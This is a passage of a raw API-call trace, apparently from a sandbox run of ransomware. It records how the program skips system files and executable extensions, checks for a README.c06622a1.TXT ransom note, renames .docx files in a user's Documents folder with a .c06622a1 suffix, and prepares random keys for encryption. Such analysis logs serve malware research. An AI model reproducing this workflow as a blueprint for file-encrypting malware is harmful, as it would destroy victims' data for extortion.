(_Str1="ntuser.dat.log", _Str2="3PvKyPdpu0lurMm.docx") returned 59 [0157.054] wcslen (_String="ntuser.dat.log") returned 0xe [0157.054] _wcsicmp (_Str1="ntuser.ini", _Str2="3PvKyPdpu0lurMm.docx") returned 59 [0157.054] wcslen (_String="ntuser.ini") returned 0xa [0157.054] _wcsicmp (_Str1="thumbs.db", _Str2="3PvKyPdpu0lurMm.docx") returned 65 [0157.054] wcslen (_String="thumbs.db") returned 0x9 [0157.054] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0157.054] wcslen (_String="386") returned 0x3 [0157.054] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0157.054] wcslen (_String="adv") returned 0x3 [0157.054] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0157.054] wcslen (_String="ani") returned 0x3 [0157.054] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0157.054] wcslen (_String="bat") returned 0x3 [0157.054] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0157.054] wcslen (_String="bin") returned 0x3 [0157.054] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0157.054] wcslen (_String="cab") returned 0x3 [0157.054] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0157.054] wcslen (_String="cmd") returned 0x3 [0157.054] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0157.055] wcslen (_String="com") returned 0x3 [0157.055] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0157.055] wcslen (_String="cpl") returned 0x3 [0157.055] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0157.055] wcslen (_String="cur") returned 0x3 [0157.055] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0157.055] wcslen (_String="deskthemepack") returned 0xd [0157.055] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0157.055] wcslen (_String="diagcab") returned 0x7 [0157.055] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0157.055] wcslen (_String="diagcfg") returned 0x7 [0157.055] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0157.055] wcslen (_String="diagpkg") returned 0x7 [0157.055] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0157.055] wcslen (_String="dll") returned 0x3 [0157.055] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0157.055] wcslen (_String="drv") returned 0x3 [0157.055] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0157.055] wcslen (_String="exe") returned 0x3 [0157.055] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0157.055] wcslen (_String="hlp") returned 0x3 [0157.055] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0157.055] wcslen (_String="icl") returned 0x3 [0157.055] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0157.055] wcslen (_String="icns") returned 0x4 [0157.056] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0157.056] wcslen (_String="ico") returned 0x3 [0157.056] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0157.056] wcslen (_String="ics") returned 0x3 [0157.056] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0157.056] wcslen (_String="idx") returned 0x3 [0157.056] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0157.056] wcslen (_String="ldf") returned 0x3 [0157.056] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0157.056] wcslen (_String="lnk") returned 0x3 [0157.056] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0157.056] wcslen (_String="mod") returned 0x3 [0157.056] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0157.056] wcslen (_String="mpa") returned 0x3 [0157.056] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0157.056] wcslen (_String="msc") returned 0x3 [0157.056] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0157.056] wcslen (_String="msp") returned 0x3 [0157.056] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0157.056] wcslen (_String="msstyles") returned 0x8 [0157.056] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0157.056] wcslen (_String="msu") returned 0x3 [0157.056] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0157.056] wcslen (_String="nls") returned 0x3 [0157.056] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0157.056] wcslen (_String="nomedia") returned 0x7 [0157.056] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0157.056] wcslen (_String="ocx") returned 0x3 [0157.057] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0157.057] wcslen (_String="prf") returned 0x3 [0157.057] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0157.057] wcslen (_String="ps1") returned 0x3 [0157.057] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0157.057] wcslen (_String="rom") returned 0x3 [0157.057] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0157.057] wcslen (_String="rtp") returned 0x3 [0157.057] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0157.057] wcslen (_String="scr") returned 0x3 [0157.057] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0157.057] wcslen (_String="shs") returned 0x3 [0157.057] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0157.057] wcslen (_String="spl") returned 0x3 [0157.057] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0157.057] wcslen (_String="sys") returned 0x3 [0157.057] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0157.057] wcslen (_String="theme") returned 0x5 [0157.057] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0157.057] wcslen (_String="themepack") returned 0x9 [0157.057] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0157.057] wcslen (_String="wpx") returned 0x3 [0157.057] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0157.057] wcslen (_String="lock") returned 0x4 [0157.057] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0157.057] wcslen (_String="key") returned 0x3 [0157.057] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0157.057] wcslen (_String="hta") returned 0x3 [0157.057] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0157.057] wcslen (_String="msi") returned 0x3 [0157.057] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0157.058] wcslen (_String="pdb") returned 0x3 [0157.058] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0157.058] wcslen (_String="sqlite") returned 0x6 [0157.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.058] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.058] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.058] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.058] wcscpy (in: _Dest=0x32100a0, _Source="3PvKyPdpu0lurMm.docx" | out: _Dest="3PvKyPdpu0lurMm.docx") returned="3PvKyPdpu0lurMm.docx" [0157.058] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx", dwFileAttributes=0x80) returned 1 [0157.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3pvkypdpu0lurmm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0157.058] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.058] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.059] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x6b10c2ec [0157.059] RtlComputeCrc32 (PartialCrc=0xc2ec, Buffer=0x32ec24, Length=0x80) returned 0xc3522d18 [0157.059] RtlComputeCrc32 (PartialCrc=0x2d18, Buffer=0x32ec24, Length=0x80) returned 0xaac3cb5e [0157.059] RtlComputeCrc32 (PartialCrc=0xcb5e, Buffer=0x32ec24, Length=0x80) returned 0x2016ca6e [0157.059] RtlComputeCrc32 (PartialCrc=0xca6e, Buffer=0x32ec24, Length=0x80) returned 0x6a64a2b6 [0157.059] CloseHandle (hObject=0x1cc) returned 1 [0157.059] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.059] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx" [0157.059] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx") returned 0x40 [0157.059] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.059] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3pvkypdpu0lurmm.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3pvkypdpu0lurmm.docx.c06622a1"), dwFlags=0x8) returned 1 [0157.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3PvKyPdpu0lurMm.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3pvkypdpu0lurmm.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0157.346] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.346] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71b6253f [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5bda7e74 [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4710a98c [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ea22686 [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f870f6d [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58dbe46d [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46dc9e4 [0157.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50a4334a [0157.353] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x48fa3e7a [0157.353] RtlComputeCrc32 (PartialCrc=0x3e7a, Buffer=0x710094, Length=0x80) returned 0x48acc6d4 [0157.353] RtlComputeCrc32 (PartialCrc=0xc6d4, Buffer=0x710094, Length=0x80) returned 0xc835ee49 [0157.353] RtlComputeCrc32 (PartialCrc=0xee49, Buffer=0x710094, Length=0x80) returned 0x7ef18431 [0157.353] RtlComputeCrc32 (PartialCrc=0x8431, Buffer=0x710094, Length=0x80) returned 0xe365c3f6 [0157.353] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.353] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acb2be0, ftCreationTime.dwHighDateTime=0x1d5a8dc, ftLastAccessTime.dwLowDateTime=0xfb874990, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xfb874990, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x6da9, dwReserved0=0x0, dwReserved1=0x0, cFileName="491FT7zCexrYLn_KV2i.docx", cAlternateFileName="491FT7~1.DOC")) returned 1 [0157.353] _wcsicmp (_Str1="491FT7zCexrYLn_KV2i.docx", _Str2="README.c06622a1.TXT") returned -62 [0157.353] wcsstr (_Str="491FT7zCexrYLn_KV2i.docx", _SubStr="README") returned 0x0 [0157.353] _wcsicmp (_Str1="autorun.inf", _Str2="491FT7zCexrYLn_KV2i.docx") returned 45 [0157.353] wcslen (_String="autorun.inf") returned 0xb [0157.353] _wcsicmp (_Str1="boot.ini", _Str2="491FT7zCexrYLn_KV2i.docx") returned 46 [0157.353] wcslen (_String="boot.ini") returned 0x8 [0157.353] _wcsicmp (_Str1="bootfont.bin", _Str2="491FT7zCexrYLn_KV2i.docx") returned 46 [0157.353] wcslen (_String="bootfont.bin") returned 0xc [0157.354] _wcsicmp (_Str1="bootsect.bak", _Str2="491FT7zCexrYLn_KV2i.docx") returned 46 [0157.354] wcslen (_String="bootsect.bak") returned 0xc [0157.354] _wcsicmp (_Str1="desktop.ini", _Str2="491FT7zCexrYLn_KV2i.docx") returned 48 [0157.354] wcslen (_String="desktop.ini") returned 0xb [0157.354] _wcsicmp (_Str1="iconcache.db", _Str2="491FT7zCexrYLn_KV2i.docx") returned 53 [0157.354] wcslen (_String="iconcache.db") returned 0xc [0157.354] _wcsicmp (_Str1="ntldr", _Str2="491FT7zCexrYLn_KV2i.docx") returned 58 [0157.354] wcslen (_String="ntldr") returned 0x5 [0157.354] _wcsicmp (_Str1="ntuser.dat", _Str2="491FT7zCexrYLn_KV2i.docx") returned 58 [0157.354] wcslen (_String="ntuser.dat") returned 0xa [0157.354] _wcsicmp (_Str1="ntuser.dat.log", _Str2="491FT7zCexrYLn_KV2i.docx") returned 58 [0157.354] wcslen (_String="ntuser.dat.log") returned 0xe [0157.354] _wcsicmp (_Str1="ntuser.ini", _Str2="491FT7zCexrYLn_KV2i.docx") returned 58 [0157.354] wcslen (_String="ntuser.ini") returned 0xa [0157.354] _wcsicmp (_Str1="thumbs.db", _Str2="491FT7zCexrYLn_KV2i.docx") returned 64 [0157.354] wcslen (_String="thumbs.db") returned 0x9 [0157.354] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0157.354] wcslen (_String="386") returned 0x3 [0157.354] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0157.354] wcslen (_String="adv") returned 0x3 [0157.354] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0157.354] wcslen (_String="ani") returned 0x3 [0157.354] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0157.354] wcslen (_String="bat") returned 0x3 [0157.354] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0157.354] wcslen (_String="bin") returned 0x3 [0157.354] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0157.354] wcslen (_String="cab") returned 0x3 [0157.354] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0157.354] wcslen (_String="cmd") returned 0x3 [0157.354] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0157.354] wcslen (_String="com") returned 0x3 [0157.354] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0157.354] wcslen (_String="cpl") returned 0x3 [0157.354] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0157.355] wcslen (_String="cur") returned 0x3 [0157.355] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0157.355] wcslen (_String="deskthemepack") returned 0xd [0157.355] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0157.355] wcslen (_String="diagcab") returned 0x7 [0157.355] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0157.355] wcslen (_String="diagcfg") returned 0x7 [0157.355] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0157.355] wcslen (_String="diagpkg") returned 0x7 [0157.355] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0157.355] wcslen (_String="dll") returned 0x3 [0157.355] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0157.355] wcslen (_String="drv") returned 0x3 [0157.355] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0157.355] wcslen (_String="exe") returned 0x3 [0157.355] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0157.355] wcslen (_String="hlp") returned 0x3 [0157.355] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0157.355] wcslen (_String="icl") returned 0x3 [0157.355] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0157.355] wcslen (_String="icns") returned 0x4 [0157.355] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0157.355] wcslen (_String="ico") returned 0x3 [0157.355] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0157.355] wcslen (_String="ics") returned 0x3 [0157.355] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0157.355] wcslen (_String="idx") returned 0x3 [0157.355] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0157.355] wcslen (_String="ldf") returned 0x3 [0157.355] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0157.355] wcslen (_String="lnk") returned 0x3 [0157.355] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0157.355] wcslen (_String="mod") returned 0x3 [0157.356] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0157.356] wcslen (_String="mpa") returned 0x3 [0157.356] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0157.356] wcslen (_String="msc") returned 0x3 [0157.356] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0157.356] wcslen (_String="msp") returned 0x3 [0157.356] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0157.356] wcslen (_String="msstyles") returned 0x8 [0157.356] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0157.356] wcslen (_String="msu") returned 0x3 [0157.356] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0157.356] wcslen (_String="nls") returned 0x3 [0157.356] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0157.356] wcslen (_String="nomedia") returned 0x7 [0157.356] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0157.356] wcslen (_String="ocx") returned 0x3 [0157.356] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0157.356] wcslen (_String="prf") returned 0x3 [0157.356] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0157.356] wcslen (_String="ps1") returned 0x3 [0157.356] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0157.356] wcslen (_String="rom") returned 0x3 [0157.356] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0157.356] wcslen (_String="rtp") returned 0x3 [0157.356] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0157.356] wcslen (_String="scr") returned 0x3 [0157.356] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0157.356] wcslen (_String="shs") returned 0x3 [0157.356] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0157.356] wcslen (_String="spl") returned 0x3 [0157.356] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0157.356] wcslen (_String="sys") returned 0x3 [0157.356] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0157.356] wcslen (_String="theme") returned 0x5 [0157.357] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0157.357] wcslen (_String="themepack") returned 0x9 [0157.357] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0157.357] wcslen (_String="wpx") returned 0x3 [0157.357] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0157.357] wcslen (_String="lock") returned 0x4 [0157.357] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0157.357] wcslen (_String="key") returned 0x3 [0157.357] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0157.357] wcslen (_String="hta") returned 0x3 [0157.357] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0157.357] wcslen (_String="msi") returned 0x3 [0157.357] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0157.357] wcslen (_String="pdb") returned 0x3 [0157.357] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0157.357] wcslen (_String="sqlite") returned 0x6 [0157.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.357] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.357] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.357] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.357] wcscpy (in: _Dest=0x32100a0, _Source="491FT7zCexrYLn_KV2i.docx" | out: _Dest="491FT7zCexrYLn_KV2i.docx") returned="491FT7zCexrYLn_KV2i.docx" [0157.357] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx", dwFileAttributes=0x80) returned 1 [0157.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\491ft7zcexryln_kv2i.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0157.361] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.361] ReadFile (in: hFile=0x1ac, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.362] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xb827e88e [0157.362] RtlComputeCrc32 (PartialCrc=0xe88e, Buffer=0x32ec24, Length=0x80) returned 0xc0b263ff [0157.362] RtlComputeCrc32 (PartialCrc=0x63ff, Buffer=0x32ec24, Length=0x80) returned 0x187c9f22 [0157.362] RtlComputeCrc32 (PartialCrc=0x9f22, Buffer=0x32ec24, Length=0x80) returned 0xd491f998 [0157.362] RtlComputeCrc32 (PartialCrc=0xf998, Buffer=0x32ec24, Length=0x80) returned 0x791ccf2f [0157.362] CloseHandle (hObject=0x1ac) returned 1 [0157.362] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.362] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx" [0157.362] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx") returned 0x44 [0157.362] wcscpy (in: _Dest=0x32200d8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.362] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\491ft7zcexryln_kv2i.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\491ft7zcexryln_kv2i.docx.c06622a1"), dwFlags=0x8) returned 1 [0157.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\491FT7zCexrYLn_KV2i.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\491ft7zcexryln_kv2i.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0157.367] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.367] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50c6ae5c [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ab9963c [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xda99ace [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38994a48 [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77abeada [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51cb89cb [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x891bcee [0157.371] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3fc640ed [0157.374] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x9b2c4e6e [0157.374] RtlComputeCrc32 (PartialCrc=0x4e6e, Buffer=0x710094, Length=0x80) returned 0x82225d2a [0157.374] RtlComputeCrc32 (PartialCrc=0x5d2a, Buffer=0x710094, Length=0x80) returned 0xf8467160 [0157.374] RtlComputeCrc32 (PartialCrc=0x7160, Buffer=0x710094, Length=0x80) returned 0x26682f1d [0157.374] RtlComputeCrc32 (PartialCrc=0x2f1d, Buffer=0x710094, Length=0x80) returned 0x76adf65f [0157.375] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.375] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.376] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.377] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba6ea640, ftCreationTime.dwHighDateTime=0x1d5df02, ftLastAccessTime.dwLowDateTime=0xa2fe04a0, ftLastAccessTime.dwHighDateTime=0x1d5d431, ftLastWriteTime.dwLowDateTime=0xa2fe04a0, ftLastWriteTime.dwHighDateTime=0x1d5d431, nFileSizeHigh=0x0, nFileSizeLow=0xdc4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="4CYSV.docx", cAlternateFileName="4CYSV~1.DOC")) returned 1 [0157.377] _wcsicmp (_Str1="4CYSV.docx", _Str2="README.c06622a1.TXT") returned -62 [0157.377] wcsstr (_Str="4CYSV.docx", _SubStr="README") returned 0x0 [0157.377] _wcsicmp (_Str1="autorun.inf", _Str2="4CYSV.docx") returned 45 [0157.377] wcslen (_String="autorun.inf") returned 0xb [0157.377] _wcsicmp (_Str1="boot.ini", _Str2="4CYSV.docx") returned 46 [0157.377] wcslen 